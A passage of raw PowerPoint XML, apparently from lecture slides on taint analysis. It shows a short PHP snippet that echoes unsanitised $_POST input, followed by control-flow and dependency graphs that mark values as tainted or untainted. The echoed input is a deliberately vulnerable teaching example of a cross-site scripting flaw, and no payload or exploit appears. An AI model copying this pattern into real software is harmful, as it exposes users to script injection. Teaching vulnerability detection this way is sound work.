          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2123728" y="1052736"/>
            <a:ext cx="4896544" cy="5400600"/>
            <a:chOff x="2483768" y="1052736"/>
            <a:chExt cx="4896544" cy="5400600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="文字方塊 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2483768" y="1052736"/>
              <a:ext cx="1403100" cy="369332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TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>PHP code</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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8" name="矩形 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2483768" y="1412776"/>
              <a:ext cx="4896544" cy="5040560"/>
            </a:xfrm>
            <a:prstGeom prst="rect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01  &lt;?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>php</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p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02        $id = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$_POST["id"]</a:t>
              </a:r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; </a:t>
              </a:r>
            </a:p>
            <a:p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03        $dept = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$_POST["dept"]</a:t>
              </a:r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;</a:t>
              </a:r>
            </a:p>
            <a:p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04        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r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 ($dept == 0) {                    //guest</a:t>
              </a:r>
            </a:p>
            <a:p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05	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>echo</a:t>
              </a:r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altLang="zh-TW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</a:t>
              </a:r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Hello! guest</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW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</a:t>
              </a:r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;</a:t>
              </a:r>
            </a:p>
            <a:p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06	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>displayWelcomePage</a:t>
              </a:r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();   </a:t>
              </a:r>
            </a:p>
            <a:p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07        }</a:t>
              </a:r>
            </a:p>
            <a:p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08        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>else</a:t>
              </a:r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 {                                      // staff</a:t>
              </a:r>
            </a:p>
            <a:p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09	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF6600"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>if</a:t>
              </a:r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 ($id == </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW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</a:t>
              </a:r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admin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW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</a:t>
              </a:r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) {       </a:t>
              </a:r>
            </a:p>
            <a:p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10	        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>echo</a:t>
              </a:r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altLang="zh-TW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</a:t>
              </a:r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Hello!</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW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 "</a:t>
              </a:r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.$id;</a:t>
              </a:r>
            </a:p>
            <a:p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11	        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>displayManagementFun</a:t>
              </a:r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();</a:t>
              </a:r>
            </a:p>
            <a:p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12 	} </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200">
                <a:buAutoNum type="arabicPlain" startAt="13"/>
              </a:pPr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         </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF6600"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>else</a:t>
              </a:r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 { </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200"/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14		        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>echo</a:t>
              </a:r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altLang="zh-TW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</a:t>
              </a:r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Hello!</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW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 "</a:t>
              </a:r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.$</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>dept.$id</a:t>
              </a:r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; </a:t>
              </a:r>
            </a:p>
            <a:p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15	        </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>displayBasicFun</a:t>
              </a:r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();</a:t>
              </a:r>
            </a:p>
            <a:p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16             }</a:t>
              </a:r>
            </a:p>
            <a:p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17        } </a:t>
              </a:r>
            </a:p>
            <a:p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18  ?&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1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 sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri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Control Flow Graph</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411760" y="1124744"/>
            <a:ext cx="2952328" cy="72008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02:  $id = $_POST["id"]; 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03:  $dept = $_POST["dept"];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755576" y="3501008"/>
            <a:ext cx="2664296" cy="720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05:  echo "Hello! guest";</a:t>
            </a:r>
          </a:p>
          <a:p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06:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>displayWelcomePage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();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2915816" y="4725224"/>
            <a:ext cx="2952328" cy="720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10:  echo "Hello! </a:t>
            </a:r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".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$id;</a:t>
            </a:r>
          </a:p>
          <a:p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11:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>displayManagementFun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();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5940152" y="4725224"/>
            <a:ext cx="2880320" cy="720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14:  echo "Hello! ".$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dept.$id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;</a:t>
            </a:r>
          </a:p>
          <a:p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15:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>displayBasicFun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();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文字方塊 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483768" y="2276872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True</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文字方塊 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4427984" y="3501008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True</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文字方塊 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="2276872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False</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文字方塊 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6660232" y="350100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False</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="橢圓 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779912" y="5805264"/>
            <a:ext cx="1224136" cy="576064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Exit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34" name="直線單箭頭接點 33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
            <a:endCxn id="32" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4211960" y="5625244"/>
            <a:ext cx="360040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44" name="肘形接點 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1997674" y="4311058"/>
            <a:ext cx="1872288" cy="1692188"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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48" name="肘形接點 47"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="2"/>
            <a:endCxn id="32" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5868144" y="4581128"/>
            <a:ext cx="648072" cy="2376264"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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46" name="六邊形 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3239852" y="2276872"/>
            <a:ext cx="1296144" cy="648072"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 40629"/>
              <a:gd name="vf" fmla="val 115470"/>
            </a:avLst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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$dept == 0</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="dk1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55" name="直線單箭頭接點 54"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3671503" y="2060451"/>
            <a:ext cx="432048" cy="794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72" name="六邊形 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5004048" y="3501008"/>
            <a:ext cx="1728192" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 40629"/>
              <a:gd name="vf" fmla="val 115470"/>
            </a:avLst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$id == "admin"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33" name="圖案 32"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="46" idx="0"/>
            <a:endCxn id="72" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4535995" y="2600908"/>
            <a:ext cx="1332000" cy="900100"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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42" name="圖案 41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="46" idx="3"/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2087724" y="2600908"/>
            <a:ext cx="1152128" cy="900100"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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45" name="圖案 44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="72" idx="3"/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4391980" y="3861048"/>
            <a:ext cx="612068" cy="864176"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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49" name="圖案 48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="72" idx="0"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6732240" y="3861048"/>
            <a:ext cx="648072" cy="864176"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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25" name="日期版面配置區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26" name="頁尾版面配置區 2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28" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="46" grpId="0" animBg="1"/>
      <p:bldP spid="7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Dependency Graph (1/3)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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7416316" y="2708920"/>
            <a:ext cx="1008112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$id , 2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矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7020272" y="1628800"/>
            <a:ext cx="1800200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$_POST[</a:t>
            </a:r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id</a:t>
            </a:r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], 2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4860032" y="1628800"/>
            <a:ext cx="2088232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$_POST[</a:t>
            </a:r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dept</a:t>
            </a:r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], 3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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5328084" y="2708920"/>
            <a:ext cx="1152128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$dept, 3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5400092" y="4149128"/>
            <a:ext cx="1152128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echo, 5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矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3275856" y="2708920"/>
            <a:ext cx="1800200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Hello! Guest</a:t>
            </a:r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, 5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25" name="直線單箭頭接點 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5580088" y="2384860"/>
            <a:ext cx="648120" cy="1588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直線單箭頭接點 26"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7596312" y="2384860"/>
            <a:ext cx="648120" cy="1588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肘形接點 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="2"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4571952" y="2744924"/>
            <a:ext cx="1008208" cy="1800200"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 61163"/>
            </a:avLst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35" name="矩形 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8028384" y="2132856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6" name="矩形 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8028384" y="3212976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7" name="矩形 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6012160" y="3212976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 smtClean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 smtClean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zh-TW" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF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38" name="矩形 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6012160" y="2132856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 smtClean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 smtClean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zh-TW" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF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39" name="矩形 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4283968" y="3212976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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Unt</a:t>
            </a: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charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>ainted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0" name="矩形 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6084168" y="4653136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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Unt</a:t>
            </a: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charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>ainted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4" name="矩形 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395536" y="1340768"/>
            <a:ext cx="2952328" cy="72008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02:  $id = $_POST["id"]; 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03:  $dept = $_POST["dept"];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5" name="矩形 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539552" y="4101128"/>
            <a:ext cx="2664296" cy="720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05:  echo "Hello! guest";</a:t>
            </a:r>
          </a:p>
          <a:p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06:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>displayWelcomePage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();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="文字方塊 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1980109" y="357301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True</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="橢圓 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1259632" y="5517232"/>
            <a:ext cx="1224136" cy="576064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Exit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50" name="六邊形 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1223628" y="2756952"/>
            <a:ext cx="1296144" cy="648072"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 40629"/>
              <a:gd name="vf" fmla="val 115470"/>
            </a:avLst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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$dept == 0</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="dk1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53" name="直線單箭頭接點 52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1526166" y="2405588"/>
            <a:ext cx="690275" cy="794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55" name="直線單箭頭接點 54"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="45" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1535637" y="3765064"/>
            <a:ext cx="672128" cy="1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58" name="直線單箭頭接點 57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="45" idx="2"/>
            <a:endCxn id="48" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1523648" y="5169180"/>
            <a:ext cx="696104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35" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="38" grpId="0"/>
      <p:bldP spid="39" grpId="0"/>
      <p:bldP spid="40" grpId="0"/>
      <p:bldP spid="44" grpId="0" animBg="1"/>
      <p:bldP spid="45" grpId="0" animBg="1"/>
      <p:bldP spid="47" grpId="0"/>
      <p:bldP spid="48" grpId="0" animBg="1"/>
      <p:bldP spid="5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Dependency Graph (2/3)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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5724128" y="5301208"/>
            <a:ext cx="1296144" cy="432048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echo, 10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3131840" y="2276872"/>
            <a:ext cx="1584176" cy="432048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Hello! </a:t>
            </a:r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, 10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" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7344308" y="2276872"/>
            <a:ext cx="1008112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$id , 2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8" name="矩形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6948264" y="1196752"/>
            <a:ext cx="1800200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$_POST[</a:t>
            </a:r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id</a:t>
            </a:r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], 2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9" name="矩形 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4788024" y="1196752"/>
            <a:ext cx="2088232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$_POST[</a:t>
            </a:r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dept</a:t>
            </a:r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], 3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" name="矩形 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5256076" y="2276872"/>
            <a:ext cx="1152128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$dept, 3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31" name="直線單箭頭接點 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5508080" y="1952812"/>
            <a:ext cx="648120" cy="1588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直線單箭頭接點 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="2"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7524304" y="1952812"/>
            <a:ext cx="648120" cy="1588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矩形 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8028384" y="170080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 smtClean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 smtClean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34" name="矩形 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
